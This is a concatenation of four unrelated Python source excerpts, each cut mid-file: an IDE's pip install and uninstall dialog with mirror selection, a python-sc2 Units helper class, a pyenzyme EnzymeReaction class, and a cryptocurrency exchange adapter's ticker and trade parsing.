row.grid(row=0,column=0,padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.EW,)
self.CreateWidgets(1,_("We will download and install it in the interpreter:"),\
_("Type the name of package or args to install:"),_("To install the specific version,type \"xxx==1.0.1\"\nTo install more packages,please specific the path of requirements.txt"))
check_best_source = True
pip_source = self.BEST_PIP_SOURCE
if utils.profile_get_int("RemberPipsource", True):
pip_source_path = self.GetPipsourcePath()
#读取上次保存的pip源,并无需检查最佳pip源
if os.path.exists(pip_source_path):
check_best_source = False
with open(pip_source_path) as f:
pip_source = f.read().strip()
if self.BEST_PIP_SOURCE is None and check_best_source:
self.CheckBestPipSource()
else:
self.SelectPipSource(pip_source)
self.auto_run()
def InstallPackage(self,interpreter):
install_args = self.args_var.get().strip()
command = strutils.emphasis_path(interpreter.GetPipPath()) + " install %s" % (install_args)
#linux系统下安装包可能需要root权限
if not sysutils.is_windows():
#如果参数里面包含--user则包安装在$HOME目录下,无需root权限
root = False if '--user ' in install_args else True
if root:
#这里是提示root权限
command = "pkexec " + command
if self.SOURCE_NAME_LIST[self._pipSourceCombo.current()] != self.SOURCE_NAME_LIST[0]:
command += " -i " + self.SOURCE_LIST[self._pipSourceCombo.current()]
host = url_parse_host(self.SOURCE_LIST[self._pipSourceCombo.current()])
command += " --trusted-host " + host
utils.get_logger().info("install command is %s",command)
self.AppendText(command + os.linesep)
self.call_back = self.AppendText
t = threading.Thread(target=self.ExecCommandAndOutput,args=(command,self))
t.start()
def CheckBestPipSource(self):
t = threading.Thread(target=self.GetBestPipSource)
t.start()
def GetBestPipSource(self):
self.AppendText(_("Checking the best pip source...\n"))
self.EnableCheckSourcButton(False)
sort_pip_source_dct = {}
for i,pip_source_name in enumerate(self.SOURCE_NAME_LIST):
pip_source = self.SOURCE_LIST[i]
api_addr = pip_source + "/ok"
start = time.time()
if urlutils.RequestData(api_addr,timeout=10,to_json=False):
end = time.time()
elapse = end - start
sort_pip_source_dct[pip_source] = elapse
utils.get_logger().debug("response time of pip source %s is %.2fs",pip_source,elapse)
if len(sort_pip_source_dct) == 0:
self.AppendText(_("Could not get the best pip source...\n"))
return
best_source,elapse = sorted(sort_pip_source_dct.items(),key = lambda x:x[1],reverse = False)[0]
utils.get_logger().info("the best pip source is %s,response time is %.2fs",best_source,elapse)
self.AppendText(_("the best pip source is %s\n")%best_source)
InstallPackagesDialog.BEST_PIP_SOURCE = best_source
self.SelectPipSource(self.BEST_PIP_SOURCE)
self.EnableCheckSourcButton(True)
self.auto_run()
@ui_utils.capture_tclerror
def SelectPipSource(self,pip_source_url=None):
index = -1
values = list(self._pipSourceCombo['values'])
#删除原来的最优源选项
for i,value in enumerate(values):
if value.find(_("The Best Source")) != -1:
values.remove(value)
values.insert(i,self.SOURCE_NAME_LIST[i])
break
#设置新的最优源
for i,pip_source in enumerate(self.SOURCE_LIST):
if pip_source == self.BEST_PIP_SOURCE:
best_source_name = self.SOURCE_NAME_LIST[i] + "(" + _("The Best Source") + ")"
values.remove(self.SOURCE_NAME_LIST[i])
values.insert(i,best_source_name)
break
#选中需要显示的源
for i,pip_source in enumerate(self.SOURCE_LIST):
if pip_source == pip_source_url:
index = i
break
self._pipSourceCombo['values'] = tuple(values)
if index != -1:
self._pipSourceCombo.current(index)
def CheckTheBestSource(self):
self.CheckBestPipSource()
@ui_utils.capture_tclerror
def EnableCheckSourcButton(self,enable=True):
if enable:
self.check_source_btn['state'] = "normal"
self.check_source_btn.configure(text=_("Check the best source"))
else:
self.check_source_btn.configure(text=_("Checking the best source"))
self.check_source_btn['state'] = tk.DISABLED
def EndDialog(self,retcode):
pkg_name = self.GetPackageName()
install_suc = False
utils.get_logger().debug('install ret code is %d',retcode)
if retcode == 0:
if pkg_name:
#检查包是否安装到解释器中
python_package = self.interpreter.GetInstallPackage(pkg_name)
#如果包存在说明安装成功
install_suc = True if python_package else False
#用户自定义输入安装参数
else:
python_package = None
self.interpreter.LoadPackages(self.master,True)
install_suc = True
if install_suc:
#只有安装成功才执行回调函数
if self.end_callback:
self.end_callback(python_package,self.interpreter)
if self.install_update:
messagebox.showinfo(GetApp().GetAppName(),_("Update Success"),parent=self)
else:
messagebox.showinfo(GetApp().GetAppName(),_("Install Success"),parent=self)
self.destroy()
else:
if self.install_update:
messagebox.showerror(GetApp().GetAppName(),_("Update Fail"),parent=self)
else:
messagebox.showerror(GetApp().GetAppName(),_("Install Fail"),parent=self)
self.EnableButton()
def run(self):
self.InstallPackage(self.interpreter)
def GetPipsourcePath(self):
cache_path = utils.get_cache_path()
pip_source_path = os.path.join(cache_path,"pip_source.txt")
return pip_source_path
def _ok(self,event=None):
if not CommonManagePackagesDialog._ok(self):
return False
#保存选择的pip源
if utils.profile_get_int("RemberPipsource",True):
pip_source_path = self.GetPipsourcePath()
with open(pip_source_path,"w") as f:
f.write(self.SOURCE_LIST[self._pipSourceCombo.current()])
pkg_name = self.GetPackageName()
if pkg_name:
#安装包时查找包是否已经安装了,如果已经安装提示用户操作选项
python_package = self.interpreter.GetInstallPackage(pkg_name)
if python_package:
choice_dlg = PackageActionChoiceDialog(self,pkg_name)
if constants.ID_OK == choice_dlg.ShowModal():
choice = choice_dlg.choice_chkvar.get()
if choice != PackageActionChoiceDialog.REINSTALL:
self.install_update = True
#用户选择安装最新版本
if choice == PackageActionChoiceDialog.UPDATE_LATEST:
#pip更新到最新版本命令
self.args_var.set("-U %s"%pkg_name)
#用户选择安装指定版本
else:
versions = get_package_versions(pkg_name)
if not versions:
self.EnableButton()
return False
specified_dlg = ui_base.SingleChoiceDialog(self,_("Choose the specified version"),_("Please choose the specified version to install:"),versions,show_scrollbar=True)
if constants.ID_OK == specified_dlg.ShowModal():
install_version = specified_dlg.selection
#pip更新到指定版本命令
self.args_var.set("%s==%s"%(pkg_name,install_version))
else:
self.EnableButton()
return False
else:
self.EnableButton()
return False
self.run()
def SetRequirementsArgs(self,path):
'''
设置通过requirements文件安装批量包的参数
'''
args = "-r "
#如果不是虚拟解释器,通过user参数安装
if not self.interpreter.IsVirtual():
args = "--user " + args
self.args_var.set(args + fileutils.opj(path))
class UninstallPackagesDialog(CommonManagePackagesDialog):
def __init__(self,parent,interpreter,interpreters=interpretermanager.InterpreterManager().interpreters,pkg_name='',uninstall_args='',\
autorun=False,call_back=None):
CommonManagePackagesDialog.__init__(self,parent,_("Uninstall Package"),interpreter,interpreters,pkg_name,uninstall_args,autorun,call_back)
self.CreateWidgets(0,_("We will uninstall it in the interpreter:"),\
_("Type the name of package or args to uninstall:"), _("To uninstall more packages,please specific the path of requirements.txt"))
self.auto_run()
def EndDialog(self,retcode):
pkg_name = self.GetPackageName()
uninstall_suc = False
if retcode == 0:
if pkg_name:
#如果包不存在说明卸载成功
python_package = self.interpreter.GetInstallPackage(pkg_name)
uninstall_suc = False if python_package else True
else:
self.interpreter.LoadPackages(self.master,True)
uninstall_suc = True
if uninstall_suc:
#只有卸载成功才执行回调函数
if self.end_callback:
self.end_callback(pkg_name,self.interpreter)
messagebox.showinfo(GetApp().GetAppName(),_("Uninstall Success"),parent=self)
self.destroy()
else:
messagebox.showerror(GetApp().GetAppName(),_("Uninstall Fail"),parent=self)
self.EnableButton()
def UninstallPackage(self,interpreter):
uninstall_args = self.args_var.get().strip()
command = strutils.emphasis_path(interpreter.GetPipPath()) + " uninstall -y %s" % (uninstall_args)
pkg_name = self.GetPackageName()
python_package = self.interpreter.GetInstallPackage(pkg_name)
#linux系统卸载包可能需要root权限
if not sysutils.is_windows():
root = False
if python_package:
pkg_location = python_package.Location
if pkg_location is not None:
#判断包安装目录是否有当前用户写的权限,如果有则不需要root,否则需要root
root = not fileutils.is_writable(pkg_location)
if root:
#这里是提示root权限
command = "pkexec " + command
| |
position: Union[Unit, Point2], n: int) -> Units:
"""
Returns the n closest units in distance to position.
Example::
enemy_zerglings = self.enemy_units(UnitTypeId.ZERGLING)
my_marine = next((unit for unit in self.units if unit.type_id == UnitTypeId.MARINE), None)
if my_marine:
zerglings_filtered = enemy_zerglings.closest_n_units(my_marine, 5)
# Contains 5 zerglings that are the closest to the marine
:param position:
:param n:
"""
assert self, "Units object is empty"
return self.subgroup(self._list_sorted_by_distance_to(position)[:n])
def furthest_n_units(self, position: Union[Unit, Point2, np.ndarray], n: int) -> Units:
"""
Returns the n furhest units in distance to position.
Example::
enemy_zerglings = self.enemy_units(UnitTypeId.ZERGLING)
my_marine = next((unit for unit in self.units if unit.type_id == UnitTypeId.MARINE), None)
if my_marine:
zerglings_filtered = enemy_zerglings.furthest_n_units(my_marine, 5)
# Contains 5 zerglings that are the furthest to the marine
:param position:
:param n:
"""
assert self, "Units object is empty"
return self.subgroup(self._list_sorted_by_distance_to(position)[-n:])
def in_distance_of_group(self, other_units: Units, distance: float) -> Units:
""" Returns units that are closer than distance from any unit in the other units object.
:param other_units:
:param distance:
"""
assert other_units, "Other units object is empty"
# Return self because there are no enemies
if not self:
return self
distance_squared = distance ** 2
if len(self) == 1:
if any(
self._bot_object._distance_squared_unit_to_unit(self[0], target) < distance_squared
for target in other_units
):
return self
else:
return self.subgroup([])
return self.subgroup(
self_unit
for self_unit in self
if any(
self._bot_object._distance_squared_unit_to_unit(self_unit, other_unit) < distance_squared
for other_unit in other_units
)
)
def in_closest_distance_to_group(self, other_units: Units) -> Unit:
"""
Returns unit in shortest distance from any unit in self to any unit in group.
Loops over all units in self, then loops over all units in other_units and calculates the shortest distance. Returns the units that is closest to any unit of 'other_units'.
:param other_units: """
assert self, "Units object is empty"
assert other_units, "Given units object is empty"
return min(
self,
key=lambda self_unit: min(
self._bot_object._distance_squared_unit_to_unit(self_unit, other_unit) for other_unit in other_units
),
)
def _list_sorted_closest_to_distance(self, position: Union[Unit, Point2], distance: float) -> List[Unit]:
""" This function should be a bit faster than using units.sorted(key=lambda u: u.distance_to(position)) """
if isinstance(position, Unit):
return sorted(
self,
key=lambda unit: abs(self._bot_object._distance_squared_unit_to_unit(unit, position) - distance),
reverse=True,
)
distances = self._bot_object._distance_units_to_pos(self, position)
unit_dist_dict = {unit.tag: dist for unit, dist in zip(self, distances)}
return sorted(self, key=lambda unit2: abs(unit_dist_dict[unit2.tag] - distance), reverse=True)
def n_closest_to_distance(self, position: Union[Point2, np.ndarray], distance: Union[int, float], n: int) -> Units:
""" Returns n units that are the closest to distance away.
For example if the distance is set to 5 and you want 3 units, from units with distance [3, 4, 5, 6, 7] to position,
the units with distance [4, 5, 6] will be returned """
return self.subgroup(self._list_sorted_closest_to_distance(position=position, distance=distance)[:n])
def n_furthest_to_distance(self, position: Union[Point2, np.ndarray], distance: Union[int, float], n: int) -> Units:
""" Inverse of the function 'n_closest_to_distance', returns the furthest units instead """
return self.subgroup(self._list_sorted_closest_to_distance(position=position, distance=distance)[-n:])
def subgroup(self, units):
"""
Creates a new mutable Units object from Units or list object.
:param units: """
return Units(units, self._bot_object)
def filter(self, pred: callable) -> Units:
"""
Filters the current Units object and returns a new Units object.
Example::
from sc2.ids.unit_typeid import UnitTypeId
my_marines = self.units.filter(lambda unit: unit.type_id == UnitTypeId.MARINE)
completed_structures = self.structures.filter(lambda structure: structure.is_ready)
queens_with_energy_to_inject = self.units.filter(lambda unit: unit.type_id == UnitTypeId.QUEEN and unit.energy >= 25)
orbitals_with_energy_to_mule = self.structures.filter(lambda structure: structure.type_id == UnitTypeId.ORBITALCOMMAND and structure.energy >= 50)
my_units_that_can_shoot_up = self.units.filter(lambda unit: unit.can_attack_air)
See more unit properties in unit.py
:param pred:
"""
assert callable(pred), "Function is not callable"
return self.subgroup(filter(pred, self))
def sorted(self, key: callable, reverse: bool = False) -> Units:
return self.subgroup(sorted(self, key=key, reverse=reverse))
def _list_sorted_by_distance_to(self, position: Union[Unit, Point2], reverse: bool = False) -> List[Unit]:
""" This function should be a bit faster than using units.sorted(key=lambda u: u.distance_to(position)) """
if isinstance(position, Unit):
return sorted(
self, key=lambda unit: self._bot_object._distance_squared_unit_to_unit(unit, position), reverse=reverse
)
distances = self._bot_object._distance_units_to_pos(self, position)
unit_dist_dict = {unit.tag: dist for unit, dist in zip(self, distances)}
return sorted(self, key=lambda unit2: unit_dist_dict[unit2.tag], reverse=reverse)
def sorted_by_distance_to(self, position: Union[Unit, Point2], reverse: bool = False) -> Units:
""" This function should be a bit faster than using units.sorted(key=lambda u: u.distance_to(position)) """
return self.subgroup(self._list_sorted_by_distance_to(position, reverse=reverse))
def tags_in(self, other: Union[Set[int], List[int], Dict[int, Any]]) -> Units:
""" Filters all units that have their tags in the 'other' set/list/dict
Example::
my_inject_queens = self.units.tags_in(self.queen_tags_assigned_to_do_injects)
# Do not use the following as it is slower because it first loops over all units to filter out if they are queens and loops over those again to check if their tags are in the list/set
my_inject_queens_slow = self.units(QUEEN).tags_in(self.queen_tags_assigned_to_do_injects)
:param other:
"""
return self.filter(lambda unit: unit.tag in other)
def tags_not_in(self, other: Union[Set[int], List[int], Dict[int, Any]]) -> Units:
"""
Filters all units that have their tags not in the 'other' set/list/dict
Example::
my_non_inject_queens = self.units.tags_not_in(self.queen_tags_assigned_to_do_injects)
# Do not use the following as it is slower because it first loops over all units to filter out if they are queens and loops over those again to check if their tags are in the list/set
my_non_inject_queens_slow = self.units(QUEEN).tags_not_in(self.queen_tags_assigned_to_do_injects)
:param other:
"""
return self.filter(lambda unit: unit.tag not in other)
def of_type(self, other: Union[UnitTypeId, Set[UnitTypeId], List[UnitTypeId], Dict[UnitTypeId, Any]]) -> Units:
"""
Filters all units that are of a specific type
Example::
# Use a set instead of lists in the argument
some_attack_units = self.units.of_type({ZERGLING, ROACH, HYDRALISK, BROODLORD})
:param other: """
if isinstance(other, UnitTypeId):
other = {other}
elif isinstance(other, list):
other = set(other)
return self.filter(lambda unit: unit.type_id in other)
def exclude_type(self, other: Union[UnitTypeId, Set[UnitTypeId], List[UnitTypeId], Dict[UnitTypeId, Any]]) -> Units:
"""
Filters all units that are not of a specific type
Example::
# Use a set instead of lists in the argument
ignore_units = self.enemy_units.exclude_type({LARVA, EGG, OVERLORD})
:param other: """
if isinstance(other, UnitTypeId):
other = {other}
elif isinstance(other, list):
other = set(other)
return self.filter(lambda unit: unit.type_id not in other)
def same_tech(self, other: Set[UnitTypeId]) -> Units:
"""
Returns all structures that have the same base structure.
Untested: This should return the equivalents for WarpPrism, Observer, Overseer, SupplyDepot and others
Example::
# All command centers, flying command centers, orbital commands, flying orbital commands, planetary fortress
terran_townhalls = self.townhalls.same_tech(UnitTypeId.COMMANDCENTER)
# All hatcheries, lairs and hives
zerg_townhalls = self.townhalls.same_tech({UnitTypeId.HATCHERY})
# All spires and greater spires
spires = self.townhalls.same_tech({UnitTypeId.SPIRE})
# The following returns the same
spires = self.townhalls.same_tech({UnitTypeId.GREATERSPIRE})
# This also works with multiple unit types
zerg_townhalls_and_spires = self.structures.same_tech({UnitTypeId.HATCHERY, UnitTypeId.SPIRE})
:param other:
"""
assert isinstance(other, set), (
f"Please use a set as this filter function is already fairly slow. For example"
+ " 'self.units.same_tech({UnitTypeId.LAIR})'"
)
tech_alias_types: Set[int] = {u.value for u in other}
unit_data = self._bot_object._game_data.units
for unitType in other:
for same in unit_data[unitType.value]._proto.tech_alias:
tech_alias_types.add(same)
return self.filter(
lambda unit: unit._proto.unit_type in tech_alias_types
or any(same in tech_alias_types for same in unit._type_data._proto.tech_alias)
)
def same_unit(self, other: Union[UnitTypeId, Set[UnitTypeId], List[UnitTypeId], Dict[UnitTypeId, Any]]) -> Units:
"""
Returns all units that have the same base unit while being in different modes.
Untested: This should return the equivalents for WarpPrism, Observer, Overseer, SupplyDepot and other units that have different modes but still act as the same unit
Example::
# All command centers on the ground and flying
ccs = self.townhalls.same_unit(UnitTypeId.COMMANDCENTER)
# All orbital commands on the ground and flying
ocs = self.townhalls.same_unit(UnitTypeId.ORBITALCOMMAND)
# All roaches and burrowed roaches
roaches = self.units.same_unit(UnitTypeId.ROACH)
# This is useful because roach has a different type id when burrowed
burrowed_roaches = self.units(UnitTypeId.ROACHBURROWED)
:param other:
"""
if isinstance(other, UnitTypeId):
other = {other}
unit_alias_types: Set[int] = {u.value for u in other}
unit_data = self._bot_object._game_data.units
for unitType in other:
unit_alias_types.add(unit_data[unitType.value]._proto.unit_alias)
unit_alias_types.discard(0)
return self.filter(
lambda unit: unit._proto.unit_type in unit_alias_types
or unit._type_data._proto.unit_alias in unit_alias_types
)
@property
def center(self) -> Point2:
""" Returns the central position of all units. """
assert self, f"Units object is empty"
amount = self.amount
return Point2(
(
sum(unit.position_tuple[0] for unit in self) / amount,
sum(unit.position_tuple[1] for unit in self) / amount,
)
)
@property
def selected(self) -> Units:
""" Returns all units that are selected by the human player. """
return self.filter(lambda unit: unit.is_selected)
@property
def tags(self) -> Set[int]:
""" Returns all unit tags as a | |
'''
Created on 09.06.2020
@author: JR
'''
from pyenzyme.enzymeml.core.functionalities import TypeChecker
from pyenzyme.enzymeml.models.kineticmodel import KineticModel
from pyenzyme.enzymeml.core.replicate import Replicate
import pandas as pd
from copy import deepcopy
class EnzymeReaction(object):
def __init__(self, temperature, tempunit, ph, name, reversible, educts=None, products=None, modifiers=None):
'''
Class to describe an enzyme reaction, its molecules/proteins, data and models
Args:
temperature: Numerical value for temperature
tempunit: Unit for temperature
ph: pH value [0-14]
name: Enzyme Reaction Name
reversible: Is Reversible bool
id_: Internal identifier
educts: List of tuples ( Reactant ID, Stoichiometry, Constant?, List Of Replicates )
products: List of tuples ( Reactant ID, Stoichiometry, Constant?, List Of Replicates )
modifiers: List of tuples ( Reactant ID, Stoichiometry, Constant?, List Of Replicates )
'''
self.setTemperature(temperature)
self.setTempunit(tempunit)
self.setPh(ph)
self.setName(name)
self.setReversible(reversible)
self.setEducts(educts)
self.setProducts(products)
self.setModifiers(modifiers)
def __setInitConc(self, conc, reactant, enzmldoc):
conc_tup = (conc, enzmldoc.getReactant(reactant).getSubstanceunits())
if conc_tup not in enzmldoc.getConcDict().values():
index = 0
while True:
id_ = "c%i" % index
if id_ not in enzmldoc.getConcDict().keys():
enzmldoc.getConcDict()[ id_ ] = conc_tup
return id_
index += 1
else:
return [ key for key, item in enzmldoc.getConcDict().items() if conc_tup == item ][0]
def exportReplicates(self, ids):
'''
Returns replicate data of given ID(s) as a pandas DataFrame.
Args:
String/ListStr ids: Single or multiple IDs of reactants/proteins
'''
ids = deepcopy(ids)
if type(ids) == str:
ids = [ids]
repls = []
all_tups = self.__educts + self.__products + self.__modifiers
for tup in all_tups:
if tup[0].split('_')[0] in ids:
repls += [ repl.getData() for repl in tup[3] ]
ids.remove(tup[0].split('_')[0])
if len(ids) > 0:
print('\nCould not find ', ids, '\n' )
return pd.DataFrame( repls ).T
def getEduct(self, id_):
'''
Returns educt tuple ( ID, Stoichiometry, IsConstant, Replicates )
Args:
String id_: Reactant internal ID
'''
for tup in self.__educts:
if tup[0] == id_:
return tup
raise KeyError( "Reactant %s not defined in educts" % id_ )
def getProduct(self, id_):
'''
Returns product tuple ( ID, Stoichiometry, IsConstant, Replicates )
Args:
String id_: Reactant internal ID
'''
for tup in self.__products:
if tup[0] == id_:
return tup
raise KeyError( "Reactant %s not defined in products" % id_ )
def getModifier(self, id_):
'''
Returns modifier tuple ( ID, Stoichiometry, IsConstant, Replicates )
Args:
String id_: Reactant/Protein internal ID
'''
for tup in self.__modifiers:
if tup[0] == id_:
return tup
raise KeyError( "Reactant/Protein %s not defined in modifiers" % id_ )
def addReplicate(self, replicate, enzmldoc):
'''
Adds replicate to EnzymeReaction object by pre-defined Replicate object ID.
If no time course data was given and error is raised.
Args:
Replicate replicate: Object describing an EnzymeML replicate.
'''
# Turn initial cocncentrations to IDs
try:
init_conc_tup = ( replicate.getInitConc(), enzmldoc.getReactant( replicate.getReactant() ).getSubstanceunits() )
inv_conc = { item: key for key, item in enzmldoc.getConcDict().items() }
replicate.setInitConc( inv_conc[ init_conc_tup ] )
except KeyError:
index = 0
init_conc_tup = ( replicate.getInitConc(), enzmldoc.getReactant( replicate.getReactant() ).getSubstanceunits() )
while True:
id_ = "c%i" % index
if id_ not in enzmldoc.getConcDict().keys():
enzmldoc.getConcDict()[ id_ ] = init_conc_tup
replicate.setInitConc(id_)
break
else:
index += 1
try:
replicate.getData()
except AttributeError:
raise AttributeError( "Replicate has no series data. Add data via replicate.setData( pandas.Series )" )
for i in range(len(self.__educts)):
if self.__educts[i][0] == replicate.getReactant():
self.__educts[i][3].append(replicate)
return 1
for i in range(len(self.__products)):
if self.__products[i][0] == replicate.getReactant():
self.__products[i][3].append(replicate)
return 1
for i in range(len(self.__modifiers)):
if self.__modifiers[i][0] == replicate.getReactant():
self.__modifiers[i][3].append(replicate)
return 1
raise AttributeError( "Replicate's reactant %s not defined in reaction" % (replicate.getReactant()) )
def addEduct(self, id_, stoichiometry, constant, enzmldoc, replicates=[], init_concs=[]):
'''
Adds educt to EnzymeReaction object. Replicates are not mandatory can be left empty if no data is given.
EnzymeMLDocument has to be given to check for un-defined entities. These should be added to the document before
a reaction is constructed.
Args:
String id_: Reactant internal ID
Float stoichiometry: Can also be given as an integer
Boolean constant: Sets if reactant is either constant or not
EnzymeMLDocument enzmldoc: Object describing an entire EnzymeML file
Replicate replicates: Single or multiple Replicate instances
'''
id_ = TypeChecker(id_, str)
if id_ not in list(enzmldoc.getReactantDict().keys()):
raise KeyError( "Reactant with id %s is not defined yet" % id_ )
stoichiometry = TypeChecker( float(stoichiometry) , float)
constant = TypeChecker(constant, bool)
if type(replicates) == list and len(replicates) > 0:
replicates = replicates
elif type(replicates) == list and len(replicates) == 0:
replicates = []
elif type(replicates) == Replicate:
replicates = [replicates]
# replace concentrations with identifiers
init_concs = [ self.__setInitConc(conc, id_, enzmldoc) for conc in init_concs ]
self.__educts.append(
(
id_,
stoichiometry,
constant,
replicates,
init_concs
)
)
def addProduct(self, id_, stoichiometry, constant, enzmldoc, replicates=[], init_concs=[]):
'''
Adds product to EnzymeReaction object. Replicates are not mandatory can be left empty if no data is given.
EnzymeMLDocument has to be given to check for un-defined entities. These should be added to the document before
a reaction is constructed.
Args:
String id_: Reactant internal ID
Float stoichiometry: Can also be given as an integer
Boolean constant: Sets if reactant is either constant or not
EnzymeMLDocument enzmldoc: Object describing an entire EnzymeML file
Replicate replicates: Single or multiple Replicate instances
'''
id_ = TypeChecker(id_, str)
if id_ not in list(enzmldoc.getReactantDict().keys()):
raise KeyError( "Reactant with id %s is not defined yet" % id_ )
stoichiometry = TypeChecker( float(stoichiometry) , float)
constant = TypeChecker(constant, bool)
if type(replicates) == list and len(replicates) > 0:
replicates = replicates
elif type(replicates) == list and len(replicates) == 0:
replicates = []
elif type(replicates) == Replicate:
replicates = [replicates]
# replace concentrations with identifiers
init_concs = [ self.__setInitConc(conc, id_, enzmldoc) for conc in init_concs ]
self.__products.append(
(
id_,
stoichiometry,
constant,
replicates,
init_concs
)
)
def addModifier(self, id_, stoichiometry, constant, enzmldoc, replicates=[], init_concs=[]):
'''
Adds product to EnzymeReaction object. Replicates are not mandatory can be left empty if no data is given.
EnzymeMLDocument has to be given to check for un-defined entities. These should be added to the document before
a reaction is constructed.
Args:
String id_: Reactant internal ID
Float stoichiometry: Can also be given as an integer
Boolean constant: Sets if reactant is either constant or not
EnzymeMLDocument enzmldoc: Object describing an entire EnzymeML file
Replicate replicates: Single or multiple Replicate instances
'''
id_ = TypeChecker(id_, str)
if id_ not in list(enzmldoc.getReactantDict().keys()) + list(enzmldoc.getProteinDict().keys()) :
raise KeyError( "Reactant/Protein with id %s is not defined yet" % id_ )
stoichiometry = TypeChecker( float(stoichiometry) , float)
constant = TypeChecker(constant, bool)
if type(replicates) == list and len(replicates) > 0:
replicates = replicates
elif type(replicates) == list and len(replicates) == 0:
replicates = []
elif type(replicates) == Replicate:
replicates = [replicates]
# replace concentrations with identifiers
init_concs = [ self.__setInitConc(conc, id_, enzmldoc) for conc in init_concs ]
self.__modifiers.append(
(
id_,
stoichiometry,
constant,
replicates,
init_concs
)
)
def getTemperature(self):
return self.__temperature
def getTempunit(self):
return self.__tempunit
def getPh(self):
return self.__ph
def getName(self):
return self.__name
def getReversible(self):
return self.__reversible
def getId(self):
return self.__id
def getMetaid(self):
return self.__metaid
def getModel(self):
return self.__model
def getEducts(self):
return self.__educts
def getProducts(self):
return self.__products
def getModifiers(self):
return self.__modifiers
def setTemperature(self, temperature):
self.__temperature = TypeChecker(float(temperature), float)
def setTempunit(self, tempunit):
self.__tempunit = TypeChecker(tempunit, str)
def setPh(self, ph):
if 0 <= TypeChecker(float(ph), float) <= 14:
self.__ph = ph
else:
raise ValueError( "pH out of bounds [0-14]" )
def setName(self, name):
self.__name = TypeChecker(name, str)
def setReversible(self, reversible):
self.__reversible = TypeChecker(reversible, bool)
def setId(self, id_):
self.__id = TypeChecker(id_, str)
self.setMetaid("METAID_" + id_.upper())
def setMetaid(self, metaID):
self.__metaid = TypeChecker(metaID, str)
def setModel(self, model):
self.__model = TypeChecker(model, KineticModel)
def setEducts(self, educts):
if educts == None:
self.__educts = []
else:
self.__educts | |
{
# "instrument_id":"btcusd",
# "last":"9574.5",
# "best_ask":"9575.0",
# "best_bid":"9574.0",
# "high_24h":"9672",
# "low_24h":"9512",
# "volume_24h":"567697050",
# "timestamp":"1595538450096"
# }
#
timestamp = self.safe_integer_2(ticker, 'timestamp', 'id')
symbol = None
marketId = self.safe_string_2(ticker, 'instrument_id', 'symbol')
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
symbol = market['symbol']
elif marketId is not None:
parts = marketId.split('_')
numParts = len(parts)
if numParts == 2:
baseId, quoteId = parts
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
else:
symbol = marketId
if (symbol is None) and (market is not None):
symbol = market['symbol']
last = self.safe_number_2(ticker, 'last', 'close')
open = self.safe_number(ticker, 'open')
bidVolume = None
askVolume = None
bid = self.safe_value(ticker, 'bid')
if bid is None:
bid = self.safe_number(ticker, 'best_bid')
else:
bidVolume = self.safe_number(bid, 1)
bid = self.safe_number(bid, 0)
ask = self.safe_value(ticker, 'ask')
if ask is None:
ask = self.safe_number(ticker, 'best_ask')
else:
askVolume = self.safe_number(ask, 1)
ask = self.safe_number(ask, 0)
baseVolume = self.safe_number_2(ticker, 'amount', 'volume_24h')
quoteVolume = self.safe_number(ticker, 'vol')
vwap = self.vwap(baseVolume, quoteVolume)
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number_2(ticker, 'high', 'high_24h'),
'low': self.safe_number_2(ticker, 'low', 'low_24h'),
'bid': bid,
'bidVolume': bidVolume,
'ask': ask,
'askVolume': askVolume,
'vwap': vwap,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}, market)
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
method = None
if market['spot']:
method = 'dataGetMarketDetailMerged'
elif market['swap']:
method = 'capiGetMarketTicker'
request = {
'symbol': market['id'],
}
response = await getattr(self, method)(self.extend(request, params))
#
# spot
#
# {
# "status":"ok",
# "ch":"market.eth_btc.detail.merged",
# "ts":1595538241474,
# "data":{
# "id":"1595538241113",
# "bid":["0.028474000000","1.139400000000"],
# "ask":["0.028482000000","0.353100000000"],
# "amount":"2850.6649",
# "count":"818",
# "open":"0.02821",
# "close":"0.028474",
# "low":"0.02821",
# "high":"0.029091",
# "vol":"79.4548693404"
# }
# }
#
# swap
#
# {
# "symbol":"btcusd",
# "last":"9575.5",
# "best_ask":"9576.0",
# "best_bid":"9575.0",
# "high_24h":"9646",
# "low_24h":"9516",
# "volume_24h":"516656839",
# "timestamp":"1595664217405"
# }
#
data = self.safe_value(response, 'data', response)
return self.parse_ticker(data, market)
async def fetch_tickers_by_type(self, type, symbols=None, params={}):
await self.load_markets()
method = None
if type == 'spot':
method = 'dataGetMarketTickers'
elif type == 'swap':
method = 'capiGetMarketTickers'
response = await getattr(self, method)(params)
#
# spot
#
# {
# "status":"ok",
# "ts":1595542893250,
# "data":[
# {
# "amount":"30086.8095",
# "count":"22450",
# "open":"9525.11",
# "close":"9591.81",
# "low":"9510.68",
# "high":"9659.7",
# "vol":"286239092.250461",
# "symbol":"btc_usdt"
# }
# ]
# }
#
# swap
#
# [
# {
# "symbol":"btcusd",
# "last":"9572",
# "best_ask":"9571.5",
# "best_bid":"9570.5",
# "high_24h":"9646",
# "low_24h":"9516",
# "volume_24h":"515401635",
# "timestamp":"1595664479952"
# }
# ]
#
data = self.safe_value(response, 'data', response)
timestamp = None
if not isinstance(response, list):
timestamp = self.safe_integer(response, 'ts')
result = {}
for i in range(0, len(data)):
ticker = self.parse_ticker(self.extend({
'timestamp': timestamp,
}, data[i]))
symbol = ticker['symbol']
result[symbol] = ticker
return self.filter_by_array(result, 'symbol', symbols)
async def fetch_tickers(self, symbols=None, params={}):
defaultType = self.safe_string_2(self.options, 'fetchTickers', 'defaultType')
type = self.safe_string(params, 'type', defaultType)
return await self.fetch_tickers_by_type(type, symbols, self.omit(params, 'type'))
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# spot
#
# {
# "id":"1",
# "price":"9533.81",
# "amount":"0.7326",
# "direction":"sell",
# "ts":"1595604964000"
# }
#
# swap
#
# {
# "trade_id":"670581881367954915",
# "price":"9553.00",
# "size":"20",
# "side":"sell",
# "timestamp":"1595605100004",
# "symbol":"btcusd"
# }
#
# spot fetchMyTrades(private)
#
# {
# "id": 29555,
# "order_id": 59378,
# "match_id": 59335,
# "symbol": "eth_usdt",
# "type": "buy-limit",
# "source": "api",
# "price": "100.1000000000",
